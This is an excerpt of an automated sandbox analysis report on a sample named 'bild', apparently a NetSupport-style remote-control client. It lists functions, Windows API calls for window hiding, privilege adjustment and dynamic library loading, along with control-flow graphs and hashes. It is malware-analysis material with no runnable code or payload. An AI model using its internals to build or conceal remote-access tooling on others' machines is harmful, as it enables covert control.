                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                    • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                    • API String ID: 3874234733-2061581830
                                                                                    • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                    • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                    • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                    • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D
                                                                                    Function 11139090 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1713 11139090-111390c5 1714 111390d2-111390d9 1713->1714 1715 111390c7-111390cd GetCurrentThreadId 1713->1715 1716 111390e0-111390fc call 11133920 call 11133400 1714->1716 1717 111390db call 11029330 1714->1717 1715->1714 1723 11139102-11139108 1716->1723 1724 111391db-111391e2 1716->1724 1717->1716 1727 1113975a-11139775 call 11161d01 1723->1727 1728 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 1723->1728 1725 1113929a-111392b0 1724->1725 1726 111391e8-111391ef 1724->1726 1737 111392b6-111392bd 1725->1737 1738 111393ef 1725->1738 1726->1725 1729 111391f5-111391fc 1726->1729 1759 111391d1 1728->1759 1760 11139171-11139177 1728->1760 1729->1725 1732 11139202-11139211 FindWindowA 1729->1732 1732->1725 1736 11139217-1113921c IsWindowVisible 1732->1736 1736->1725 1741 1113921e-11139225 1736->1741 1742 111392bf-111392c9 1737->1742 1743 111392ce-111392ee call 1105dd10 1737->1743 1744 111393f1-11139402 1738->1744 1745 11139435-11139440 1738->1745 1741->1725 1747 11139227-1113924c call 11138c30 IsWindowVisible 1741->1747 1742->1745 1743->1745 1765 111392f4-11139323 1743->1765 1749 11139404-11139414 1744->1749 1750 1113941a-1113942f 1744->1750 1751 11139442-11139462 call 1105dd10 1745->1751 1752 11139476-1113947c 1745->1752 1747->1725 1772 1113924e-1113925d IsIconic 1747->1772 1749->1750 1750->1745 1768 11139470 1751->1768 1769 11139464-1113946e call 1102cff0 1751->1769 1754 1113947e-1113948a call 11138c30 1752->1754 1755 1113948d-11139495 1752->1755 1754->1755 1763 111394a7-111394b2 call 1112ce90 1755->1763 1764 11139497-111394a2 call 1106b860 1755->1764 1759->1724 1760->1759 1770 11139179-11139190 call 11146450 GetForegroundWindow 1760->1770 1785 111394b4-111394ba call 11131b00 1763->1785 1786 111394bd-111394c6 1763->1786 1764->1763 1783 11139325-11139339 call 11081a70 1765->1783 1784 1113933e-11139351 call 11143230 1765->1784 1768->1752 1769->1752 1790 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 1770->1790 1791 111391be-111391c0 1770->1791 1772->1725 1777 1113925f-1113927a GetForegroundWindow call 11131210 * 2 1772->1777 1821 1113928b-11139294 EnableWindow 1777->1821 1822 1113927c-11139282 1777->1822 1783->1784 1804 1113933b 1783->1804 1805 11139353-11139364 GetLastError call 11146450 1784->1805 1806 1113936e-11139375 1784->1806 1785->1786 1788 111394d4 call 111317a0 1786->1788 1789 111394c8-111394cb 1786->1789 1797 111394d9-111394df 1788->1797 1789->1797 1798 111394cd-111394d2 call 11131870 1789->1798 1790->1791 1791->1759 1801 111391c2-111391c8 1791->1801 1808 111394e5-111394eb 1797->1808 1809 111395e9-111395f4 call 111386b0 1797->1809 1798->1797 1801->1759 1811 111391ca-111391cb SetForegroundWindow 1801->1811 1804->1784 1805->1806 1815 11139377-11139392 1806->1815 1816 111393e8 1806->1816 1817 111394f1-111394f9 1808->1817 1818 1113959b-111395a3 1808->1818 1829 111395f6-11139608 call 110637c0 1809->1829 1830 11139615-1113961b 1809->1830 1811->1759 1832 11139395-111393a1 1815->1832 1816->1738 1817->1809 1826 111394ff-11139505 1817->1826 1818->1809 1824 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 1818->1824 1821->1725 1822->1821 1823 11139284-11139285 SetForegroundWindow 1822->1823 1823->1821 1824->1809 1826->1809 1833 1113950b-11139522 call 1110f420 1826->1833 1829->1830 1848 1113960a-11139610 call 11142210 1829->1848 1836 11139621-11139628 1830->1836 1837 1113974a-11139752 1830->1837 1838 111393a3-111393b7 call 11081a70 1832->1838 1839 111393bc-111393c9 call 11143230 1832->1839 1852 11139544 1833->1852 1853 11139524-11139542 call 110573b0 1833->1853 1836->1837 1844 1113962e-11139647 call 1105dd10 1836->1844 1837->1727 1838->1839 1860 111393b9 1838->1860 1839->1816 1855 111393cb-111393e6 GetLastError call 11146450 1839->1855 1844->1837 1865 1113964d-11139660 1844->1865 1848->1830 1856 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 1852->1856 1853->1856 1855->1745 1856->1809 1893 11139594-11139599 call 110ebf30 1856->1893 1860->1839 1874 11139662-11139668 1865->1874 1875 1113968d-11139693 1865->1875 1876 11139699-111396a5 GetTickCount 1874->1876 1879 1113966a-11139688 call 11146450 GetTickCount 1874->1879 1875->1837 1875->1876 1876->1837 1880 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 1876->1880 1879->1837 1899 111396f0-111396f5 1880->1899 1893->1809 1899->1899 1900 111396f7-111396fd 1899->1900 1901 11139700-11139705 1900->1901 1901->1901 1902 11139707-11139731 call 1112c7a0 1901->1902 1905 11139733-11139734 FreeLibrary 1902->1905 1906 1113973a-11139747 call 111618c1 1902->1906 1905->1906 1906->1837
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                    • IsWindow.USER32(00030462), ref: 11139125
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139133
                                                                                    • IsWindowVisible.USER32(00030462), ref: 1113916B
                                                                                    • GetForegroundWindow.USER32 ref: 11139186
                                                                                    • EnableWindow.USER32(00030462,00000000), ref: 111391A0
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 111391BC
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                    • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139248
                                                                                    • IsIconic.USER32(00030462), ref: 11139255
                                                                                    • GetForegroundWindow.USER32 ref: 1113925F
                                                                                      • Part of subcall function 11131210: ShowWindow.USER32(00030462,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                      • Part of subcall function 11131210: ShowWindow.USER32(00030462,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 11139294
                                                                                    • GetLastError.KERNEL32 ref: 11139353
                                                                                    • GetLastError.KERNEL32 ref: 111393CB
                                                                                    • GetTickCount.KERNEL32 ref: 11139678
                                                                                    • GetTickCount.KERNEL32 ref: 11139699
                                                                                      • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                    • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                    • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                    • API String ID: 2511061093-2542869446
                                                                                    • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                    • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                    • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                    • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                    Function 11115B70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                    • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                    • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                    • API String ID: 4195908086-2348320231
                                                                                    • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                    • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                    • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                    • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                    Function 110733B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID: NBCTL32.DLL$_License$serial_no
                                                                                    • API String ID: 2102423945-35127696
                                                                                    • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                    • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                    • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                    • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                    Function 110310C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: Client32$NSMWClass$NSMWClass
                                                                                    • API String ID: 3192549508-611217420
                                                                                    • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                    • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                    • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                    • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                    Function 1109E910 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                    • EqualSid.ADVAPI32(?,00A1ECC8,?,00000001,00000001), ref: 1109E9A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InformationToken$AllocateEqualInitialize
                                                                                    • String ID:
                                                                                    • API String ID: 1878589025-0
                                                                                    • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                    • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                    • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                    • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                    Function 1109D440 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,420B7E12,00080000,00000000,00000000), ref: 1109D46D
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                    • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                    • String ID:
                                                                                    • API String ID: 2349140579-0
                                                                                    • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                    • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                    • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                    • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                    Function 1109D4D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                    • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                    • String ID:
                                                                                    • API String ID: 81990902-0
                                                                                    • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                    • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                    • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                    • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                    Function 1102E640 Relevance: 241.6, APIs: 31, Strings: 106, Instructions: 1869windowthreadsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
